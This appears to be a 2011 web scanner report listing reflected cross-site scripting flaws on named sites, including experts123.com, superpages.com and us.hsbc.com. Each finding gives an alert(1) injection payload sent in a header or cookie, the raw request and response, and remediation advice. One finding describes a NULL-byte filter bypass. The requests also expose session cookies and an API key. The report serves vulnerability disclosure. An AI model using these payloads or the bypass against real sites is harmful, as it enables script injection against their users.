GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d6163";alert(1)//498765472fb"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d0800";alert(1)//0d9e6834871"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "11ee8";alert(1)//0fd04f86b98"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "aeb3b";alert(1)//3f4b39407ec"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389
Response (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="%00ba07d"-alert(1)-"85da7928a00"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
var remote_add = "REMOTE_ADDR=173.193.214.243"; var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '2118 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
